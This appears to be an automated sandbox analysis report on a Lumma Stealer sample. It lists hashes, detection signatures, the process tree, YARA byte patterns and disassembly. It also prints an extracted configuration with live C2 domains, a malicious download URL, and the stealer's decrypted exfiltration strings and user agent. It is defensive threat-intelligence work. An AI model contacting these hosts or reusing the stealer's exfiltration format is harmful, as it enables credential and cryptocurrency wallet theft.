
Windows Analysis Report
L7GNkeVm5e.exe

Overview

General Information

Sample name: L7GNkeVm5e.exe (renamed because original name is a hash value)
Original sample name: f7db525dd98ee5fbdc9c11d59b93985b.exe
Analysis ID: 1589517
MD5: f7db525dd98ee5fbdc9c11d59b93985b
SHA1: 1d722eb6df789efffa180f73bc9f3799d91115f1
SHA256: 1385f8cf1b5f14beabab56b3208665cea34dd1933d4c6679cf1157287e4ec379
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • L7GNkeVm5e.exe (PID: 768 cmdline: "C:\Users\user\Desktop\L7GNkeVm5e.exe" MD5: F7DB525DD98EE5FBDC9C11D59B93985B)
    • EB86.tmp.exe (PID: 412 cmdline: "C:\Users\user\AppData\Local\Temp\EB86.tmp.exe" MD5: 08494E6A1E788EA3259955A4524FDFEC)
      • WerFault.exe (PID: 3472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 884 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["soundtappysk.shop", "apporholis.shop", "handscreamny.shop", "chipdonkeruz.shop", "skidjazzyric.click", "femalsabler.shop", "crowdwarek.shop", "versersleep.shop", "robinsharez.shop"], "Build id": "4h5VfH--"}
Source | Rule | Description | Author | Strings
00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0xf88:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000002.2358816622.0000000000602000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x1760:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
    No Sigma rule has matched
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-01-12T17:52:06.451964+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 104.102.49.254 | 443 | TCP
    2025-01-12T17:52:05.725642+0100 | 2059035 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 65437 | 1.1.1.1 | 53 | UDP
    2025-01-12T17:52:05.755307+0100 | 2059037 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 52066 | 1.1.1.1 | 53 | UDP
    2025-01-12T17:52:05.736408+0100 | 2059039 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 55144 | 1.1.1.1 | 53 | UDP
    2025-01-12T17:52:05.714240+0100 | 2059041 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 61207 | 1.1.1.1 | 53 | UDP
    2025-01-12T17:52:05.766501+0100 | 2059043 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57954 | 1.1.1.1 | 53 | UDP
    2025-01-12T17:52:05.777221+0100 | 2059049 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 55763 | 1.1.1.1 | 53 | UDP
    2025-01-12T17:52:05.685065+0100 | 2059088 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 63165 | 1.1.1.1 | 53 | UDP
    2025-01-12T17:52:05.700683+0100 | 2059051 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 65028 | 1.1.1.1 | 53 | UDP
    2025-01-12T17:52:05.746939+0100 | 2059057 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59972 | 1.1.1.1 | 53 | UDP
    2025-01-12T17:52:01.923189+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 172.67.179.207 | 443 | TCP
    2025-01-12T17:52:02.739573+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 176.113.115.19 | 80 | TCP
    2025-01-12T17:52:06.933921+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49706 | 104.102.49.254 | 443 | TCP


    AV Detection

    Source: L7GNkeVm5e.exe | Avira: detected
    Source: https://robinsharez.shop:443/api | Avira URL Cloud: Label: malware
    Source: https://post-to-me.com/fh/0 | Avira URL Cloud: Label: malware
    Source: https://versersleep.shop:443/api | Avira URL Cloud: Label: malware
    Source: https://chipdonkeruz.shop:443/apih | Avira URL Cloud: Label: malware
    Source: https://crowdwarek.shop:443/api | Avira URL Cloud: Label: malware
    Source: https://apporholis.shop:443/apiiP | Avira URL Cloud: Label: malware
    Source: https://skidjazzyric.click:443/api | Avira URL Cloud: Label: malware
    Source: 2.2.EB86.tmp.exe.400000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["soundtappysk.shop", "apporholis.shop", "handscreamny.shop", "chipdonkeruz.shop", "skidjazzyric.click", "femalsabler.shop", "crowdwarek.shop", "versersleep.shop", "robinsharez.shop"], "Build id": "4h5VfH--"}
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe | ReversingLabs: Detection: 50%
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | ReversingLabs: Detection: 50%
    Source: L7GNkeVm5e.exe | Virustotal: Detection: 39%
    Source: L7GNkeVm5e.exe | ReversingLabs: Detection: 50%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe | Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Joe Sandbox ML: detected
    Source: L7GNkeVm5e.exe | Joe Sandbox ML: detected
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: robinsharez.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: handscreamny.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: chipdonkeruz.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: versersleep.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: crowdwarek.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: apporholis.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: femalsabler.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: soundtappysk.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: skidjazzyric.click
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: TeslaBrowser/5.5
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: - Screen Resoluton:
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: - Physical Installed Memory:
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: Workgroup: -
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: 4h5VfH--

    Compliance

    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Unpacked PE file: 0.2.L7GNkeVm5e.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Unpacked PE file: 2.2.EB86.tmp.exe.400000.0.unpack
    Source: L7GNkeVm5e.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
    Source: unknown | HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: Binary string: .pDB~B source: L7GNkeVm5e.exe
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_004389E2 FindFirstFileExW | 0_2_004389E2
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_02138C49 FindFirstFileExW | 0_2_02138C49
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, edx | 2_2_0040B2B0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h | 2_2_00419840
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [edi+eax] | 2_2_0040A05C
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h | 2_2_00427070
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov dword ptr [esp+3Ch], edx | 2_2_0043B870
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov edx, ecx | 2_2_0043B870
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 2_2_0042D830
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h | 2_2_0043F0E0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0041B882
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then jmp eax | 2_2_004418A0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0041B173
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 2_2_0042B170
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0041A900
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0041B184
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then test esi, esi | 2_2_0043C9A0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [ecx], al | 2_2_0041B243
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 2_2_0042EA62
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov eax, dword ptr [edi+0Ch] | 2_2_00402210
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, eax | 2_2_0040AA32
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h] | 2_2_00425AF0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, eax | 2_2_00428280
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] | 2_2_0041F2A0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ebx, eax | 2_2_00405AB0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ebp, eax | 2_2_00405AB0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 2_2_0042EB5F
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_0042BB00
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0041BB21
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov dword ptr [esp+14h], 00000000h | 2_2_00441B20
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], cl | 2_2_0041AB2A
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh] | 2_2_0040C334
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh] | 2_2_0040C3EC
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ebx, edx | 2_2_0042DBF0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then jmp ecx | 2_2_0040D334
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 2_2_00422380
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h] | 2_2_0041BBA0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov dword ptr [ebx], 00000022h | 2_2_0042BBA0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 2_2_0042EBA1
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, eax | 2_2_00440BAB
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 2_2_0042EBB3
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov dword ptr [esp+14h], 00000000h | 2_2_00441BB0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov dword ptr [esp+14h], 00000000h | 2_2_00441C40
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, eax | 2_2_00442470
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h | 2_2_00426C76
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov eax, edi | 2_2_0041C400
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [esi], al | 2_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h] | 2_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov edx, ecx | 2_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 2_2_00414C20
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h | 2_2_0044042D
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, eax | 2_2_0044042D
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], cl | 2_2_0041B484
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov word ptr [esi], cx | 2_2_00427490
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h | 2_2_00425D6A
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_00438520
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh | 2_2_00442D20
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then push edi | 2_2_0043C5A0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h] | 2_2_0043C5A0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 2_2_0042B652
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], cl | 2_2_0041B667
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, dword ptr [0044C548h] | 2_2_00418672
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00409E09
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 2_2_00407620
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 2_2_00407620
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then jmp ecx | 2_2_0040CEC7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h] | 2_2_00416ED0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h] | 2_2_0041BEE1
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0041AEFF
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov esi, ecx | 2_2_00415720
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, eax | 2_2_00415720
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh] | 2_2_0040DFE2
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [eax], cl | 2_2_0040DFE2
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h] | 2_2_00408F90
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh | 2_2_004427B0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh] | 2_2_0216E249
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [eax], cl | 2_2_0216E249
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [edi+eax] | 2_2_0216A2C3
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h | 2_2_0219F347
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0217B3DA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0217B3EB
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0216A070
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov esi, ecx | 2_2_021760EF
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h] | 2_2_02177137
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then jmp ecx | 2_2_0216D12E
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h] | 2_2_0217C148
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0217B166
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h] | 2_2_021691F7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov dword ptr [esp+14h], 00000000h | 2_2_021A21EA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then jmp ecx | 2_2_0216D59B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov eax, edi | 2_2_0217C667
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h | 2_2_021A0694
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, eax | 2_2_021A0694
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, eax | 2_2_021A26D7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov word ptr [esi], cx | 2_2_021876F7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], cl | 2_2_0217B6EB
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [esi], al | 2_2_0217773F
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_02198787
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov eax, dword ptr [edi+0Ch] | 2_2_02162477
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [ecx], al | 2_2_0217B4AA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, eax | 2_2_021884E7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] | 2_2_0217F507
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh] | 2_2_0216C59B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 2_2_021825E7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh | 2_2_021A2A17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, edx | 2_2_0216BA6C
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 2_2_0218DA97
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h | 2_2_02179AA7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov dword ptr [esp+3Ch], edx | 2_2_0219BAD7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov edx, ecx | 2_2_0219BAD7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h] | 2_2_02177AE4
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov edx, ecx | 2_2_02177AE4
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0217BAE9
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0217AB67
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h | 2_2_02186BA7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, dword ptr [0044C548h] | 2_2_02178809
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then push edi | 2_2_0219C807
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h] | 2_2_0219C807
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 2_2_02167887
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 2_2_02167887
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 2_2_0218B8B5
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 2_2_021758FA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 2_2_0218EE1A
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, eax | 2_2_021A0E12
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 2_2_0218EE08
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov dword ptr [ebx], 00000022h | 2_2_0218BE07
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h] | 2_2_0217BE2C
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ebx, edx | 2_2_0218DE57
